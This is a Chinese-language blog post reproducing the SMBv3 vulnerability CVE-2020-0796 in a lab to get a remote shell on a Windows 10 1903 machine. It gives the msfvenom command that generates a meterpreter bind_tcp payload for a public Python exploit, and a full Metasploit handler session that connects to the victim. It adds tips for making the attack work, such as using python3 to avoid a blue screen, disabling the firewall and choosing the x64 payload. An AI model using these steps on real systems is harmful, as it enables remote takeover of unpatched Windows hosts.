CVE-2020-0796(SMBv3)漏洞复现获取shell

SMBv3介绍

服务器消息块(SMB),是一个网络通信协议,用于提供共享访问到文件,打印机和串行端口的节点之间的网络上。它还提供了经过身份验证的进程间通信机制。SMB的大多数用法涉及运行Microsoft Windows的计算机,在引入Active Directory之前被称为“ Microsoft Windows网络” 。相应的Windows服务是用于服务器组件的LAN Manager服务器和用于客户端组件的LAN Manager工作站。

复现

0796出现有一段日子了,前两天出了python版本的exp,rb的还等待大佬整合:P ,所以paylload还得要自己用msf生成替换掉poc里的的USER_PAYLOAD

复现环境:
攻击机kali ip:192.168.10.128
受害机ip(1903):192.168.10.132

msfvenom -p windows/meterpreter/bind_tcp lport=4444 -f py -o  exp.py
cat exp.py

CVE-2020-0796(SMBv3)漏洞复现获取shell_第1张图片
CVE-2020-0796(SMBv3)漏洞复现获取shell_第2张图片
开始攻击,python2会蓝屏,记得把python变量切换为python3还有win10环境记得关闭防火墙,脚本限制目前还有点大:
CVE-2020-0796(SMBv3)漏洞复现获取shell_第3张图片
攻击:
CVE-2020-0796(SMBv3)漏洞复现获取shell_第4张图片
msf:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload 
#记住一定要使用x64版本,不然很多奇奇怪怪问题,懂的都懂.jpg
windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set rhost 192.168.10.132
rhost => 192.168.10.132
msf5 exploit(multi/handler) > run

获取到shell
CVE-2020-0796(SMBv3)漏洞复现获取shell_第5张图片
受害机查看端口,已经连上:
CVE-2020-0796(SMBv3)漏洞复现获取shell_第6张图片

复现结束:)

你可能感兴趣的:(复现与实战,安全漏洞)